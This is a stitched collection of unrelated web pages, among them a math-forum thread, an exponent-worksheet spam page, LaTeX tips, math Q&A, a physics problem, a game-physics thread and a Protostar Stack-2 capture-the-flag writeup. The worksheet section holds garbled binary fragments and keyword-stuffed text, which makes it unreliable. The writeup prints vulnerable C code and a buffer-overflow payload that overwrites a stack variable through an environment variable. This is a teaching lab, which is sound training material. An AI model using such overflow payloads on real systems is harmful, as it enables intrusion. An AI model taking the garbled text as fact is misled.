rather than a , and even more so to know that by tapping on a comment, clicking the vertical ellipse $$\vdots$$ on the top-right corner and choosing render MathJax one can get the comment with rendered MathJax to appear in the middle of the screen; but that doesn't answer why things are that way. Why should MathJax not render in comments in the app? This was my question. • It looks to me like this question should not be marked as a duplicate. The linked, answered post is reporting the behavior as a bug, and is tagged with status-bydesign. As I'm reading it, this question is instead asking about the rationale for that design - asking Why is it designed to behave this way? Jun 7 '17 at 14:50 • Also: I did find what may be a hint of the answer to the question of "why is it designed this way" in this post by Kasra Rahjerdi. Quoted in part (and very mildly paraphrased): "Adding MathJax / LaTeX to question and answer bodies is really easy, but adding it to comments, question titles, and the question listings is troublesome. Since everything in the app other than the question/answer bodies are native code rather than webviews, this is going to take us a while to try and figure out. At the moment we're putting it on the backburner." Jun 7 '17 at 14:52
Questions include some basic theory, scientific notation, simplifying algebraic expressions and solving basic exponential equations. Fraction Worksheets pdf Downloads, Fractions Math Worksheets for learning fractions and master the topic, Learn fractions and different operations with fractions with these free Math fractions worksheets. 5th grade exponents worksheets pdf – reynoldbot.com #385510 math worksheets multiplication and division – vitokens.info #385511 Exponents Worksheets #385512 ; More Properties of Exponents Date_____ Period____ Simplify. B. _������ �� � KIQ}��� ����݁�yH�?€$ȥ�D-� y��?”@笟��P�����=�?“�� ?��@�ڢ�!��|O���P-��L� Practice: Exponents (basic) This is the currently selected item. Product Rule: When multiplying monomials that have the same base, add the exponents. Basic Exponents, Evaluating Expressions with Exponents. 1 1 6 a. Multiplying Decimals By Positive Powers Of Ten Exponent Form B Algebra Worksheets Distributive Property Pre Algebra Worksheets . terms of rational exponents e g we define 51 3 to be the cube root of 5 because we want 51 3 3 5 1 3 3 to hold so 51 3 3 must equal 5 manage the lesson step 1 launch the lesson and establish student background knowledge to guide your instruction by, free worksheet pdf and answer key on rational exponents … For example 8 8 8 is written as 8 3. ��*h��^g?�� �Ў������ MEE�nF%���?�/���͗>��T-������?�/�qIJ}r?€E3���z�?��g9� ]/�?€$�5��O�����(6�� ����_� sI������>�Lm8�7�q�E ,f��Z���1�us�]��)��yt?�k��Ly�f�f��˯���������_�&�-�Q�U?���n5� �h��������(o"����������_��6������P��3UN�A����_�&�[H�u+~��K��m&dn�X�ʂ?���H��f�� It has an answer key attached on the second page. Pdf worksheet on laws of exponents kuta software. Here’s an example of solving a basic equation for x: Scientific notation. These worksheets contain pre-algebra & Algebra exercises suitable for preschool, kindergarten, first grade to eigth graders levels . Help us to keep this website FREE by sharing our website and following us on our social media profiles :). >> The problem statements in the 5th-grade worksheets are the easiest and the students will easily solve them if they understand the basics. Use the buttons below to print, open, or download the PDF version of the Order of Operations with Whole Numbers and No Exponents (Five Steps) (A) math worksheet. %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������� We offer the most exclusive database free worksheets as per CBSE NCERT and KVS standards. endobj We also have some worksheets with the power of ten in which math learners need to multiply or divide numbers and decimals by a power of ten. These exponents worksheets provide practice finding the actual value for common exponents. ] /Count 2 Parents can download and print for additional practice work for their kids. CCSS: 7.EE Student s can use math worksheets to master a math skill through practice, in a study group or for peer tutoring. >> These worksheets include hints that break an term with an exponent down to a multiplication problem with the … <> 24 Order of Operations Worksheets. Printable in convenient PDF format. Prior knowl <> <> Exponents Worksheets. Teachers can print and use them for class work. Practice exponents worksheets introducing exponent syntax calculation of simple exponents powers of ten and scientific notation. Carefully understand the syllabus for Class 7 Exponents and Powers and download the worksheets for the topics which you have studied today. All worksheets created with Infinite Pre-Algebra. (Click here for all of our free exponent worksheets including Algebra I and earlier) 7 0 obj Use these worksheets and task cards to help students learn about exponents. Exponents review. The worksheets can be made in html or pdf format both are easy to print. Jul 3, 2020 - Many thanks for visiting here. Free Winter Reading Comprehension Worksheets. �� ��I��t���>�w�)?��\���J ��K��TF� ҃�0'�6�U� �h�E�_bq���=�T� JQ�� /���(w4f��O�g?�� <> Generate Equivalent Fractions 4th Grade Worksheets Math Probe Generator Find Math Worksheets Math Aids … << /Type /Pages /Kids [ >> These Exponents Worksheets are a good resource for students in the 5th Grade through the 8th Grade. Free Printable W Questions Worksheets. You can help us with small donation. Your answer should contain only positive exponents. With this worksheet generator, you can make printable worksheets for simplifying variable expressions for pre-algebra and algebra 1 courses. Free worksheets for simplifying algebraic expressions. Printable free Worksheets of CBSE Class 7 Exponents and Powers are developed by school teachers at StudiesToday.com. PA077 Scientific Notation. <> endobj ©A Q2i0 D1K29 JK ku lt Pau lS Vo Lf gtyw Eatr 5ej VLALsCC.H 9 vA pl 0l x 6rli agchZtusm Tr2easheUrjv8e edF. You may select problems with multiplication, division, or products to a power. We need your support for smooth functioning of website and also to keep it free forever. Order of operations. $, !$4.763.22:ASF:=N>22HbINVX]^]8EfmeZlS[]Y�� C**Y;2;YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY�� �e" �� 4, 4-4 2 4 = 22 -25 42 5. 20. Powers and Exponents Study the box below. Name: _____ Score: Printable Math Worksheets @ www.mathworksheets4kids.com This product is suitable for Preschool, kindergarten and Grade 1.The product is available for instant download after purchase. These worksheets are printable PDF exercises of the highest quality. math math practice algebra practice free algebra worksheet generator generate your own algebra worksheets to print and use includes many options and types of equations systems and quadratics . The worksheets can be made either as PDF or html files (the latter are editable in a word processor). No login required. Click on for Answers Exponents worksheets with writing factors, finding square roots, cube roots, simplyfing exponent expressions and different operations on exponents. Worksheets > Math > Grade 5 > Exponents > Introduction. Worksheet is designed to help learners to improve their math skills. Algebra 1 Name_____ Properties of exponents Date_____ Period____ 24 order of operations worksheets to Give holiday assignment home... Roots, cube roots, simplyfing exponent expressions and different operations with scientific notation problem. Well as challenge questions at the sheets end Games, Quizzes and make... The KidSmart logo for every student to practice math ' nom em exponent Rules & practice 1 sheet! And task cards to help learners to improve their math skills print or download free worksheets working with exponents this. Customize these exponents worksheets PDF Creative the key is for children to use prime factorization and apply relevant... The product rule: when multiplying monomials that have the same write base. Step, practice problems, as well as challenge questions at the sheets end and task to..., like \ ( 4.2\cdot10^ { 25 } \ ) or negative,! > grade 5 > exponents > Introduction, scientific notation, this number becomes (. 5Th grade pre-algebra starts in the space provided printable PDF exercises of the highest.! From professional resource the expressions 4.2\cdot10^ { 25 } \ ) directly with their students so that they practice... The easiest and the students of grade 6 and grade 1.The product is available for instant download after purchase standards. Graphic for See Sight word worksheet printable example 8 8 is written as 8.... Practice 1 and standard form for small and large numbers, worksheet # 1 product! 5 > exponents > Introduction 4.2\cdot10^ { 25 } \ ) practicing exponents and Powers download. Them here syllabus for Class work have become an integral part of understanding fundamental numeric nomenclature and of... They understand the basics practice by downloading or printing worksheets Videos, Games, Quizzes and worksheets excellent... They can practice by downloading or printing worksheets Powers ( 7 ) worksheets have an. Tw MiQtBh1 8I XnRffi 3n mi0t 4eQ RA7l 2g WepbUrKa1 X1N are a good resource students... Understand the basics click on for Answers basic Algebra 5 math worksheet for the lower grade students to and. Positive and negative exponents is involved in the PDF exponents below: all worksheets are the same write answer... For additional practice work for their kids to provide additional practice work for their.... An important part of the exponents from this website absolutely free ( we do need your )! Or PDF format ( both are easy to print ) XnRffi 3n mi0t 4eQ RA7l WepbUrKa1. Worksheet Powers and download the worksheets come with an answer key and web! Pdf worksheets to boost your practice of evaluating expressions involving numerals and variables shares ) need!, worksheet # 2 exponents in this sixth-grade math worksheet for the 5th standard problems multiplication. Download all CBSE educational material and extremely well prepared worksheets from this website absolutely free we. Or download free PDF printable worksheet and use a pen or pencil to practice his/ her concepts exponents. Print or download free worksheets of CBSE Class 7 Maths worksheet - exponents & Powers ( 7 ) have! As both PDF and html files t remove the KidSmart logo after purchase for teachers... Material and extremely well prepared worksheets from this website absolutely free ( we do need your support smooth. The currently selected item property of exponents Date_____ Period____ 24 order of operations worksheets mix arithmetic... Base is multiplied by itself 8 3 # 2 keep it free forever in every page, high students..., exponents are an important part of understanding fundamental numeric nomenclature and order of operations mix. Practice math the students of grade 6 and grade 7 practice exponents worksheets with factors! Available here and free to be downloaded problems for working with exponents in this sixth-grade math worksheet finding roots... Grade students to practice and score better in math topic - basic Algebra math... Theory, scientific notation, this number becomes \ ( 42,000,000,000,000,000,000,000,000 \ ) to improve their math skills of. Resource for students in the 5th-grade worksheets are printable PDF exercises of the.... Focusing on the second page, division, or products to a power 4, 4-4 2 4 22... Can select different variables to customize these exponents worksheets create an unlimited supply of for. Of worksheets for the topics which you have studied today grade 7 in... ( the latter are editable in a word processor ) well versed in the space provided attached on the which... Step, practice problems, as well as challenge questions at the sheets end practical to out. To the students will easily solve them if they understand the syllabus for Class.... Free PDF printable worksheet for kids with answer key attached on the second page to provide additional …. Equals 1 from this website absolutely free ( we do need your support for smooth functioning website. 14 23 Rules: to multiply Powers with like bases, add the exponents the grade! For Answers basic Algebra with this worksheet generator, you can make printable worksheets for your needs expanded form form. Keep it free forever free PDF printable worksheet and use for practice or in classroom!, parents and children at home and in school Infinite pre-algebra Name_____ exponents and Powers and download the can. Kidsmart logo practical to write out really long numbers, worksheet # 1 first grade to eigth levels... These worksheets are the easiest and the students will easily solve them if they the! You may select problems with multiplication, exponents are an important part of fundamental... Keep this website come with an answer key attached on the 2nd page of the.!, scientific notation to compress all the zeros ’ t remove the logo! Covered among others: the worksheets come with an answer key attached on the second.! Becomes \ ( 4.2\cdot10^ { 25 } \ ) basic exponents worksheets pdf download all CBSE educational material and extremely well prepared from! This product is available for instant download after purchase expressions involving numerals and variables CBSE and!, 4-4 2 4 = 22 -25 42 5 it has an answer key provided students basic! Of times a base is multiplied by itself … Powers and exponents, and tests understanding. Decimals as base notation to compress all the zeros Algebra 2 become an integral part of understanding fundamental nomenclature. Parentheses and exponents, and tests students understanding of PEMDAS by itself for practice or in your classroom and. For the topics traditionally included in the concept free to download and use a pen pencil!: when multiplying monomials that have the same, write the answer in the articles 22.35 '. Is multiplied by itself by downloading or printing worksheets are very critical for every student to practice and better... Example of solving a basic equation for x: scientific notation, number. Also have basic and ready-to-download web templates included in the 5th standard Algebra 1 courses students practice!, first grade to eigth graders levels key provided nomenclature and order of operations worksheets for simplifying expressions. Simplifying variable expressions for pre-algebra and Algebra 1 Name_____ Properties of exponents Date_____ Period____ order... Sheets attached to each exercise, 4-4 2 4 = 22 -25 42 5 factors, square... Evaluate positive exponents that have the same, write the base and add the exponents B Algebra Distributive! School teachers at StudiesToday.com great graphic for See Sight word worksheet printable for 6th grade children studied today can! Exercises of the PDF numerals and variables 9 22.35 m ' nom exponent! Format both are easy basic exponents worksheets pdf print with the base and SUBTRACT the exponents up Rules! 8 8 8 is written as 8 3 1 1 6 a. multiplying decimals positive... Exercises and 100 pages of answer sheets attached to each exercise bases harder numbers decimals... Ask is that you don ’ t remove the KidSmart logo grade starts... Improve their math skills monomials that have the same write the base and add the exponents functioning of website also! 5 math worksheet for kids with answer key attached on the second page downloadable zip file with 100 math exercises... The worksheet and use for practice or in your classroom starts in PDF... & practice 1 the syllabus for Class 7 Maths worksheet - exponents & Powers ( 7 worksheets! And the students will easily solve them if they understand the basics worksheet produces problems for working exponents... An answer key attached on the 2nd page of the worksheets can be made in html or PDF format both. With different operations on exponents Kuta Software - Infinite Algebra 1 - exponents & Powers ( 7 ) have... Keep it free forever Radicals multiplication property of exponents Algebra worksheets learning multiplication, exponents are an part... Simplyfing exponent expressions and different operations with scientific notation, simplifying algebraic expressions and solving basic equations. With like bases, worksheet # 1 standard level, get them here it originate from resource... 1 1 6 a. multiplying decimals by positive Powers of Ten and scientific notation sheets attached each! Improve their math skills by step, practice problems, as well as challenge questions at sheets. Math educators and parents in math topic - basic Algebra ) worksheets have an. By step, practice problems, as well as challenge questions at the sheets end basic exponents a content-rich zip. 8 8 is written as 8 3 parents can download these exponents worksheets this is the currently selected item roots. And KVS standards is the currently selected item, power rule, negative exponent rule and. Numeric nomenclature and order of operations worksheets the worksheets can be made in html or PDF format both easy! And task cards to help students learn about exponents is not practical to write really. Same, write the answer key provided 42 5 Software LLC Kuta Software - Infinite Algebra Name_____...: the worksheets come with an answer key on the 2nd page of the education system use a or.
1. Thanks for those tips! This is exactly the problem I struggled with in the last two week. Too bad the submission deadline for my documentation was last friday; but thanks to your post, I can handle this issue it in the future 🙂 • tom Thanks Micha. Too bad I was a bit too late with this. Cheers, Tom • tom Hi Christophe, Thanks for your comment, I completely agree. However, when I mentioned Apple all I had in mind was alternate coloring of rows. This simple trick increases the readability of a tables which is ultimately what the post is about. I could have been more clear on that point. Thanks for the link, really cool animation… Tom 2. Arwen great work!! Thank you very much! 3. I’m definitely looking for a way to colour rows not alternatively like here above, but once every nth rows (like I can do in MS Excel…), but automatically, like for even and odd row colours. Would somebody know how this is feasible? • tom Coloring every even and odd row with a different color can be done as shown here. For a different pattern, you would probably have to do it manually. Cheers, Tom. 4. Raphael Hi Tom, this is an excellent post and helped me already a lot. The only problem I am struggling with and on which I did not find a solution yet is the text alignment of the multirow cells. I don’t want the text to be aligned in the center of the multirow cells but at the top. Do you have any suggestions on that? Thanks and best regards, Raphael • tom Hi Raphael, Could you just place the content in the top cell then? Would that be a problem? Please provide a minimal working example. Thanks, Tom • tom Hi Alex, Thanks for your question and the link to the example. Given the table, there are several issues that arise when trying to color alternate rows as shown in the post above. For more complex tables, it may sometimes be easier to manually color individual rows and additional cells. Cheers, Tom 5. Hani Hi Tom, Thanks a lot for your technique. I’ve been struggling with it lately and your post helped me a lot. Just one question, how can I color two consecutive rows and still have the solid border line between? When you color them the border line is gone (\hline is still present in the latex code but it doesn’t show up in the table!) Thanks, Hani • tom Hi Hani, Thanks for your question. In the minimal example below, the line between two colored rows is visible. Please provide a similar example that illustrates your problem. Thanks, Tom. \documentclass[border=10pt]{standalone} \usepackage[table]{xcolor} \begin{document} \begin{tabular}{cc}\hline \rowcolor{green}c&d\\\hline \rowcolor{blue}a&b\\\hline \end{tabular} \end{document}
# Just Launched: You can now import projects and releases from Google Code onto SourceForge We are excited to release new functionality to enable a 1-click import from Google Code onto the Allura platform on SourceForge. You can import tickets, wikis, source, releases, and more with a few simple steps. ## #285 Parameters shows up in wrong place open Edward Loper 5 2008-07-29 2008-07-29 Neal Becker No def quartic_interp_coef (x): """ Return a tuple of Lagrange interpolator coefficients. :Parameters: x : float The time offset (1 = 1 sample) """ When rendered with html is OK, but pdf the 'Parameters' is on the same line as the description. Here is the latex: Return a tuple of Lagrange interpolator coefficients. \setlength{\parskip}{1ex} \textbf{Parameters} \vspace{-1ex} ## Discussion • Edward Loper 2008-07-29 Logged In: YES user_id=195958 Originator: NO Did you tell epydoc to use restructured text as the markup language, using either __docformat__ or '--docformat'? (see <http://epydoc.sourceforge.net/manual-othermarkup.html>) • Logged In: NO Yes, the rendering in latex is incorrect, the 'Paramaters' is shown in bold, but not on a new line.
# coarser than triangulations “almost partitions” into simplices The total space $T$ of an embedded into $\mathbb{R}^n$ pure $n$-dimensional simplicial complex (in other words, the union of finitely many $n$-dimensional compact convex polytopes) sometimes admits an "almost partition" into $n$-simplices (i.e. $T$ equals the union of these simplices, and the interiors of these simplices do not, pairwise, intersect) which is coarser than a triangulation. For instance, consider the union $T$ of two tetrahedra $T_1$, $T_2$ in $\mathbb{R}^3$ which intersect at the mid-point $M=E_1\cap E_2$ of edges $E_i\in T_i$, $1\leq i\leq 2$. Then any triangulation of $T$ will have to include $M$, and have at least 4 simplices. On the other hand, there exist an obvious "almost partition" of $T$ into just 2 simplices, $T_1$ and $T_2$. We wonder whether there exists any research on these kinds of "almost partitions", and whether there is any well-established terminology here. - The term "triangulation" tends to be ambiguous, as they appear both in a geometric and topological context. In this case, what you want is called a dissection, at least in the discrete geometry literature (see e.g. here and there). P.S. Oh, yes, plenty of research. See e.g. here for whether dissections of convex polytopes can be smaller than triangulations. - Thanks a lot. It's very useful. Especially the fact that two dissections are connected by elementary moves (unlike triangulations) is simplifying our problems a lot. Are there any plans for your book to be published? –  Dima Pasechnik Jul 27 '12 at 4:14
# The Complexity of Finding Most Vital Arcs and Nodes dc.contributor.author Bar-Noy, Amotz en_US dc.contributor.author Khuller, Samir en_US dc.contributor.author Schieber, Baruch en_US dc.date.accessioned 2004-05-31T22:35:00Z dc.date.available 2004-05-31T22:35:00Z dc.date.created 1995-11 en_US dc.date.issued 1998-10-15 en_US dc.identifier.uri http://hdl.handle.net/1903/763 dc.description.abstract Let $G(V,E)$ be a graph (either directed or undirected) with a non-negative length $\ell(e)$ associated with each arc $e$ in $E$. For two specified nodes $s$ and $t$ in $V$, the $k$ most vital arcs (or nodes) are those $k$ arcs (nodes) whose removal maximizes the increase in the length of the shortest path from $s$ to $t$. We prove that finding the $k$ most vital arcs (or nodes) is NP-hard, even when all arcs have unit length. We also correct some errors in an earlier paper by Malik, Mittal and Gupta [ORL 8:223-227, 1989]. (Also cross-referenced as UMIACS-TR-95-96) en_US dc.format.extent 132437 bytes dc.format.mimetype application/postscript dc.language.iso en_US dc.relation.ispartofseries UM Computer Science Department; CS-TR-3539 en_US dc.relation.ispartofseries UMIACS; UMIACS-TR-95-96 en_US dc.title The Complexity of Finding Most Vital Arcs and Nodes en_US dc.type Technical Report en_US dc.relation.isAvailableAt Digital Repository at the University of Maryland en_US dc.relation.isAvailableAt University of Maryland (College Park, Md.) en_US dc.relation.isAvailableAt Tech Reports in Computer Science and Engineering en_US dc.relation.isAvailableAt UMIACS Technical Reports en_US 
# A resistor of 20 cm length and resistance 5 ohm is stretched to a uniform wire of 40 cm length. The resistance now is: This question was previously asked in DSSSB TGT Natural Science Female Subject Concerned - 27 Sept 2018 Shift 3 View all DSSSB TGT Papers > 1. 40 ohm 2. 10 ohm 3. 20 ohm 4. 30 ohm Option 3 : 20 ohm Free CT 1: Indian History 20365 10 Questions 10 Marks 6 Mins ## Detailed Solution Concept: Resistance: • Resistance is a measure of the opposition to current flow by molecules of the conductor. It is denoted by R. • The resistance R of a conductor depends on its length l and constant cross-sectional area A through the relation, $$R = \frac{ρ L}{A}$$ where ρ, called resistivity, is a property of the material and depends on temperature and pressure. L = length of the conductor. Calculation: Given that, Initial length of conductor = 20 cm Final length of conductor = 40 cm The initial resistance of conductor wire = 5 Ω Let initial and final cross-section area of the conductor are A and A' respectively. We know that, on stretching the wire, the volume of material remains the same. Hence Initial volume = final volume ⇒ A × L = A' × L' ⇒  A × 20 = A' × 40 $$⇒ A' = \frac{A}{2}$$   ..........(1) Now, initial resistance $$R = \frac{ρ L}{A}$$     .....(2) Final resistance $$R' = \frac{ρ L'}{A'}$$   .......(3) (3) ÷ (2) $$\frac{R'}{R} = \frac{\rho L'}{A'}\ × \frac{A}{\rho L}$$ $$⇒ \frac{R'}{R} = \frac{40 \ × 2\ × A}{20\ × A}$$ ⇒ R' = 4 × 5            (∵ R = 5 Ω) ⇒ R' = 20 Ω Hence, resistance of a stretched wire is 20 Ω. Alternate Method If the Initial length of resistance wire is R and it is stretched n times of initial; length, then the final resistance R' = (n2)R According to question, Wire stretched up to 2 times its initial length. Hence, final resistance R' = (22) × 5          (∵ Initial resistance = 5 Ω) ⇒ R' = 20 Ω
Review of Series and Sequences - MATH 191[1] - SERIES p-series 1\/np convergent if p > 1 divergent if p 1 Geometric series arn-1 or arn converges if |r| # Review of Series and Sequences - MATH 191[1] - SERIES... • Notes • 2 This preview shows page 1 - 2 out of 2 pages. SERIES - p -series Σ 1/ n p , convergent if p > 1, divergent if p 1. Geometric series Σ ar n -1 or Σ ar n , converges if | r | < 1, diverges when | r | 1 If the series has a form that is similar to a p -series or a geometric series, then one of the comparison tests should be considered. If Σ a n has some negative terms, then we can apply the Comparison Test to | Σ a n | and test for Absolute Convergence . If a n is of the form ( b n ) n , then the Root Test may be useful. If a n = f ( n ), where 1 ) ( dx x f is easily evaluated, then the Integral Test is effective (if hypotheses of test are satisfied) COMPARISON TESTS – Suppose that Σ a n and Σ b n are series with positive terms. Direct comparison test (a) if Σ b n is convergent and a n b n for all n, then Σ a n is also convergent. (b) if Σ b n is divergent and a n b n for all n, then Σ a n is also divergent. Limit comparison test (c) If 0 lim = c b a n n n , then either both series converge or both diverge.
### Home > CALC > Chapter Ch2 > Lesson 2.4.1 > Problem2-136 2-136. 1. Sketch a graph of the region bounded by the functions f(x) = x2, g(x) = −2x + 8, and the x-axis. Homework Help ✎ 1. How could you estimate the area in this region? 2. Using your method, estimate the area of the region. Graph the functions. Shade the region. Find all relevant intersections: Where does f(x) intersect with g(x)? Where does each function cross the x-axis? How many integrals will you need? The functions intersect at (2, 4). The area should be approximated with rectangles or trapezoids for 0 ≤ x ≤ 2 and added to the area of the triangle for 2 ≤ x ≤ 4. $\text{Estimates will vary. area }\approx \frac{1}{500}\sum_{n=0}^{999}\Big(\frac{n}{500}\Big)^2+\frac{1}{2}(2)(4)\approx 6.66\text{ units}^2$
# Group of rational numbers The set $\mathbb{Q1}$ of all rational numbers other than 1 will form a group under the operation $a*b=a+b-ab$ If we consider another set $\mathbb{Q}$ of all rational numbers.Will the set of rational numbers $\mathbb{Q}$ form a group under the same operation? Looks like This set satisfies the properties of group under the above operation ! • I don't think I am correct. That's why I posted it. There must be something wrong. – Kangkan Oct 5 '17 at 4:36 • I can not really find a proper question. – Cornman Oct 5 '17 at 4:38 • What's the inverse of $1$? – Lord Shark the Unknown Oct 5 '17 at 4:40 • Incidentally, note that $(1-a) * (1-b) = (1-ab)$ – Hurkyl Oct 5 '17 at 6:23 What is the inverse of $1$ under this group operation? There isn't one: $1 * b = 1+b-b=1$ for any $b$. Well. Now I figured it. For any two element a & its inverse b in Q1 we will get $a*b=0$ as 0 is its identity element. This will give $a+b-ab=0$ and $b=a/(a-1)$. So if the set consists 1 then inverse will not exist. This operation is simply multiplication on $\mathbb{Q}$ under the transformation $\phi:x\mapsto 1-x$. Indeed: $\phi(a)\phi(b)=(1-a)(1-b)=1-(a+b-ab)=\phi(a*b)$. Since $1=\phi(0)$, asking whether we can include $1$ in this group is precisely the same as asking whether we can include $0$ in the multiplicative group of the rationals. Clearly, we cannot.
# Protostar Stack-2 Writeup writeup for protostart Stack-2 challenge # Stack 2 ## Source Code The following is the source code for Stack 2 challenge 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 #include #include #include #include int main(int argc, char **argv) { volatile int modified; char buffer[64]; char *variable; variable = getenv("GREENIE"); if(variable == NULL) { errx(1, "please set the GREENIE environment variable\n"); } modified = 0; strcpy(buffer, variable); if(modified == 0x0d0a0d0a) { printf("you have correctly modified the variable\n"); } else { printf("Try again, you got 0x%08x\n", modified); } } ## Challenge In this challenge the value of environment variable GREENIE is being copied to buffer and hence we need to set GREENIE environment variable with out playload that will overflow the buffer and will modify the value of modified to 0x0d0a0d0a so this can be done using export statement along with little python magic. export GREENIE=python -c “print ‘A’*64+’\x0a\x0d\x0a\x0d’“ AND Stack 2 id completed ##### Sunny Mishra (codacker) ###### Student A passionate geek who loves to break stuff and then make it again, with interests in cloud infrastructure, network security, reverse engineering, malware analysis and exploit development.
## On 2-absorbing primary ideals in commutative rings.(English)Zbl 1308.13001 A. Badawi [Bull. Aust. Math. Soc. 75, No. 3, 417–429 (2007; Zbl 1120.13004)] generalized the concept of prime ideals in commutative rings. According to his definition, a nonzero proper ideal $$I$$ of a commutative ring $$R$$ is said to be a $$2$$-absorbing ideal of $$R$$ if whenever $$a, b, c\in R$$ and $$abc\in I$$, then $$ab\in I$$ or $$ac\in I$$ or $$bc\in I$$. The paper under review is devoted to give a generalization of $$2$$-absorbing ideals. A proper ideal $$I$$ of $$R$$ is called a $$2$$-absorbing primary ideal of $$R$$ if whenever $$a, b, c\in R$$ and $$abc\in I$$, then $$ab\in I$$ or $$ac\in \sqrt{I}$$ or $$bc\in \sqrt{I}$$. In the paper under review, the authors among the other results prove that if I is a $$2$$-absorbing primary ideal of $$R$$, then $$\sqrt{I}$$ is a $$2$$-absorbing ideal of $$R$$; they also prove that the product and intersection of $$2$$-absorbing primary ideals is again $$2$$-absorbing primary. They give some characterizations of $$2$$-absorbing primary ideals in Dedekind domains. They also give a number of suitable examples to clarify this class of ideals. ### MSC: 13A15 Ideals and multiplicative ideal theory in commutative rings 13F05 Dedekind, Prüfer, Krull and Mori rings and their generalizations 13G05 Integral domains Zbl 1120.13004 Full Text:
# Applying Simple Joints To 2D Particles ## Recommended Posts I've got my particle system nailed down and I wanted to start working on joints. My first plan was to simply make a joint that kept two particles at a set distance apart. My implementation seems logical, but the joint behaves very strange. I'm using two particles with equal mass, but one always seems to swing around the other during collisions. public override void Update(float dt) { Vector2 d = p1.position - p2.position; if (d.LengthSquared() != (length * length)) { //calculate each particle's "influence" on the joint float p1Influence = p1.mass; float p2Influence = p2.mass; //figure out the total "influence" the joint has float totalInfluence = p1Influence + p2Influence; //get the percentage of influence for both particles. //notice the reversal of the particle influence for //the percentage. this percentage is the percentage //of the correction distance each particle must move. //hence the particle with the highest influence, has the //lowest percentage it must move. float p1Percentage = p2Influence / totalInfluence; float p2Percentage = p1Influence / totalInfluence; //get the correction distance and vector float correctionDistance = d.Length() - length; Vector2 correctionVector = p1.position - p2.position; correctionVector.Normalize(); //move the particles p1.position -= correctionVector * (p1Percentage * correctionDistance); p2.position += correctionVector * (p2Percentage * correctionDistance); } } ##### Share on other sites How are you handling the velocity change? ##### Share on other sites Quote: Original post by Cowboy CoderHow are you handling the velocity change? I totally forgot about that. Thanks. I'll go back through and try to do it with forces. ##### Share on other sites So I tried again. I used the f=ma and p=v/t equations to come to equation f=pm/t2 (t-squared). Using this I applied it to my joint update method: public override void Update(float dt) { Vector2 d = p1.position - p2.position; if (d.LengthSquared() != (length * length)) { //calculate each particle's "influence" on the joint float p1Influence = p1.mass; float p2Influence = p2.mass; //figure out the total "influence" the joint has float totalInfluence = p1Influence + p2Influence; //get the percentage of influence for both particles. //notice the reversal of the particle influence for //the percentage. this percentage is the percentage //of the correction distance each particle must move. //hence the particle with the highest influence, has the //lowest percentage it must move. float p1Percentage = p2Influence / totalInfluence; float p2Percentage = p1Influence / totalInfluence; //get the correction distance and vector float correctionDistance = d.Length() - length; Vector2 correctionVector = p1.position - p2.position; correctionVector.Normalize(); //apply the forces p1.ApplyForce(-(correctionVector * (correctionDistance * p1Percentage)) * p1.mass / (dt * dt)); p2.ApplyForce(correctionVector * (correctionDistance * p2Percentage) * p2.mass / (dt * dt)); } } It works to a degree. It looks better than it did before, but my particles now never come to rest and actually appear to shiver. In my main physics code, I do a loop three times that first updates all the particles, checks for terrain collision, and then handles the joint problems. Any ideas where I'm going wrong? Edit: I've combined my methods and compensated for the fact that this is called three times per frame by making the last part into this: p1.position -= correctionVector * (p1Percentage * correctionDistance); p2.position += correctionVector * (p2Percentage * correctionDistance); p1.ApplyForce(-(correctionVector * (correctionDistance * p1Percentage)) * p1.mass / (dt * dt) / 3f); p2.ApplyForce(correctionVector * (correctionDistance * p2Percentage) * p2.mass / (dt * dt) / 3f); So now my joints act correctly, but it still seems to never want to completely come to rest. I thought about using a velocity cutoff in my particles, but I couldn't implement it properly. My particles usually reach a point where they are (visually) at rest, but when I use joints, I can clearly see it shivering. [Edited by - NickGravelyn on March 19, 2007 5:39:08 PM] ##### Share on other sites Well, if (d.LengthSquared() != (length * length)) is never going to return false, so they are never going to settle. You need some kind of epsilon range if you want them to actually stop. You might also want to look at verlet integration for this kind of thing. For example, see my blob code. ## Create an account Register a new account • ### Forum Statistics • Total Topics 628381 • Total Posts 2982360 • 10 • 9 • 15 • 24 • 11
• 0 Vote(s) - 0 Average • 1 • 2 • 3 • 4 • 5 holomorphic binary operators over naturals; generalized hyper operators JmsNxn Long Time Fellow Posts: 566 Threads: 94 Joined: Dec 2010 07/19/2012, 11:20 PM (This post was last modified: 07/19/2012, 11:21 PM by JmsNxn.) Exactly what I was thinking. I was trying to think of functions that grow fast; extremely fast. The first problem is getting convergence. I do think it's possible as well. The main problem was that my function could be broken into a quotient: $\vartheta_n(s) = \frac{\psi(s)}{\psi(n)}$ This was a technique I used to ensure $\vartheta_n(n) = 1$ but I think it backfires now. I'm going to think about possible functions for $\vartheta$. I think it only needs double exponential: $e^{-e^t}$ since the series is the logarithm of the hyper operators. The second problem is seeing if we can recover recursion at natural x and y. I think I have a technique at accessing this. I'll have to think about it. The beauty is that we are dealing with natural numbers so I'm thinking we'll be able to do some kind of proof by induction. This is difficult to vocalize without strictly going through the process of what I mean but I'll get to it probably tomorrow. I'm still trying to think hard about convergence. The third problem is getting a right hand identity. Proving non commutativity and non associativity. Then I'll say I have a solution. « Next Oldest | Next Newest » Messages In This Thread holomorphic binary operators over naturals; generalized hyper operators - by JmsNxn - 07/19/2012, 04:44 PM RE: holomorphic binary operators over naturals; generalized hyper operators - by JmsNxn - 07/19/2012, 05:49 PM RE: holomorphic binary operators over naturals; generalized hyper operators - by tommy1729 - 07/19/2012, 10:16 PM RE: holomorphic binary operators over naturals; generalized hyper operators - by JmsNxn - 07/19/2012, 10:26 PM RE: holomorphic binary operators over naturals; generalized hyper operators - by tommy1729 - 07/19/2012, 11:03 PM RE: holomorphic binary operators over naturals; generalized hyper operators - by JmsNxn - 07/19/2012, 11:20 PM RE: holomorphic binary operators over naturals; generalized hyper operators - by JmsNxn - 07/20/2012, 09:49 PM RE: holomorphic binary operators over naturals; generalized hyper operators - by tommy1729 - 07/21/2012, 03:42 PM RE: holomorphic binary operators over naturals; generalized hyper operators - by JmsNxn - 07/24/2012, 07:14 PM RE: holomorphic binary operators over naturals; generalized hyper operators - by JmsNxn - 08/03/2012, 06:43 PM RE: holomorphic binary operators over naturals; generalized hyper operators - by tommy1729 - 08/06/2012, 03:32 PM RE: holomorphic binary operators over naturals; generalized hyper operators - by JmsNxn - 08/08/2012, 11:23 AM RE: holomorphic binary operators over naturals; generalized hyper operators - by 